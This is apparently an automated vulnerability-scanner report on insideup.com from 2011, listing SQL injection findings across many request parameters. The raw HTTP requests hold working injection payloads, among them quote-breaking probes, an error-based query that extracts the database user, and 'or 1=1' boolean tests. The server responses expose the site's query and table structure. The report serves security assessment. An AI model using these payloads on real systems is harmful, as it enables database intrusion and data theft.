GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006'&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:28:58 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=o5qbmdt8fghth8j26f2gqfcku4; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8318
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... committed or do not have lines currently&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=110006'&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/incn00/project.php?catId=110006&iusrc=' at line 5
Request 2
GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006''&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:29:00 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=l621tsn1rdt640s5cli1d6p936; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 50912
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The website parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the website parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa'&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:30:21 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=7vk955uieovcapa3e1kd649bf6; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8318
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... committed or do not have lines currently&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a'&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/incn00/project.php?catId=110006&iusrc=' at line 5
Request 2
GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa''&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:30:22 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=h1kvvgkoc6a7ohh89th8pjssb0; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 50912
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The zip parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the zip parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code' HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:30:31 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=rc5gvda62ubel6d07d1f72o8r2; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8318
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... committed or do not have lines currently&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select chr(95' at line 5
Request 2
GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code'' HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:30:32 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=4nrd7ovmnuq177lbhheaoragj1; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 50912
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:36:18 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=9vni5bdb9t47ch4ipoj4nah3b2; path=/ Content-Length: 2494 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... adflow'/incn00/project_dynamic_page_updated.php?catId=110006&group=incn00&template=3' OR prj.project_page_url = 'leadflow'/incn00/project_dynamic_page_updated.php?catId=110006&group=incn00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=110006&group=incn00&template=3' OR prj.project_page_url = 'leadflow'/incn' at line 5
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:36:30 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=6octl09cd8a62jmqqdlch3s3o4; path=/ Content-Length: 2494 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... adflow/incn00'/project_dynamic_page_updated.php?catId=110006&group=incn00&template=3' OR prj.project_page_url = 'leadflow/incn00'/project_dynamic_page_updated.php?catId=110006&group=incn00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=110006&group=incn00&template=3' OR prj.project_page_url = 'leadflow/incn0' at line 5
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:36:41 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=c4r0labnf6usukmrtoh0uggbh2; path=/ Content-Length: 2494 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... adflow/incn00/project_dynamic_page_updated.php'?catId=110006&group=incn00&template=3' OR prj.project_page_url = 'leadflow/incn00/project_dynamic_page_updated.php'?catId=110006&group=incn00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=110006&group=incn00&template=3' OR prj.project_page_url = 'leadflow/incn0' at line 5
The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:31:07 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=s7b9ikmjrkujnttgaq52aje3h6; path=/ Content-Length: 2494 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... adflow/incn00/project_dynamic_page_updated.php?catId=110006'&group=incn00&template=3' OR prj.project_page_url = 'leadflow/incn00/project_dynamic_page_updated.php?catId=110006'&group=incn00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'group=incn00&template=3' OR prj.project_page_url = 'leadflow/incn00/project_dyna' at line 5
The group parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the group parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:31:14 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=p2p1pqg4p3l5eo5oo2gq9tb113; path=/ Content-Length: 2494 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... adflow/incn00/project_dynamic_page_updated.php?catId=110006&group=incn00'&template=3' OR prj.project_page_url = 'leadflow/incn00/project_dynamic_page_updated.php?catId=110006&group=incn00'&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/incn00/project_dynamic_page_updated.php?ca' at line 5
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:35:49 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=p0fjtfeu4mm7306md9ahgt4v92; path=/ Content-Length: 2526 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... ncn00/project_dynamic_page_updated.php?catId=110006&group=incn00&template=3&1'=1' OR prj.project_page_url = 'leadflow/incn00/project_dynamic_page_updated.php?catId=110006&group=incn00&template=3&1'=1/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/incn00/project_dynamic_page_updated.php?ca' at line 5
The template parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the template parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:31:29 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=1foakm9eejrg79pmuisogd3812; path=/ Content-Length: 2494 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... adflow/incn00/project_dynamic_page_updated.php?catId=110006&group=incn00&template=3'' OR prj.project_page_url = 'leadflow/incn00/project_dynamic_page_updated.php?catId=110006&group=incn00&template=3'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/incn00/project_dynamic_page_updated.php?catId=110006&group=incn00&templ' at line 5
The ca parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ca parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:51:12 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=81s3n7s3djjq2dfj4di0njfe22; path=/ Content-Length: 2182 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/leadflow/inco00/project.php?ca'' OR prj.project_page_url = 'leadflow/inco00/leadflow/inco00/project.php?ca'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/inco00/leadflow/inco00/project.php?ca'/' union select prj.catId,prj.gr' at line 5
The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:50:55 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=7tgqqo3n5epjss11chmmmrokl2; path=/ Content-Length: 2214 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... ps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/leadflow/inco00/project.php?catId='' OR prj.project_page_url = 'leadflow/inco00/leadflow/inco00/project.php?catId='/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/inco00/leadflow/inco00/project.php?catId='/' union select prj.catId,pr' at line 5
The iusrc parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iusrc parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:54:55 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=pe9vrtpbbmgrno2eua5h4e4gj3; path=/ Content-Length: 2310 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... j.groupId where prj.project_page_url = 'leadflow/inco00/leadflow/inco00/project.php?catId=60003&iusrc='' OR prj.project_page_url = 'leadflow/inco00/leadflow/inco00/project.php?catId=60003&iusrc='/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/inco00/leadflow/inco00/project.php?catId=60003&iusrc='/' union select ' at line 5
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 06:55:00 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=2iip6t2tboqkimm9qguqkrm8s1; path=/ Content-Length: 122 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/inco00/leadflow/inco00/project.php was not found on this server.</p>
1.431. http://www.insideup.com/ppc/leadflow/inco00/leadflow/inco00/project.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.insideup.com
Path:
/ppc/leadflow/inco00/leadflow/inco00/project.php
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 07:06:05 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=nb5sdml1r11akij4ecrcj90kr6; path=/ Content-Length: 2246 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... ps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/leadflow/inco00/project.php?catId=&1'=1' OR prj.project_page_url = 'leadflow/inco00/leadflow/inco00/project.php?catId=&1'=1/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/inco00/leadflow/inco00/project.php?catId=&' at line 5
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:44:20 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7438 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... (SELECT user)LIMIT 1),0x59),0,0x4E)),CHAR(95),CHAR(33),CHAR(64)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&phone=Phone&subcategoryId=60003&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=60003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting/Fina' at line 5
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:44:20 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7323 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 10666913'%20or%201%3d1--%20 and 10666913'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
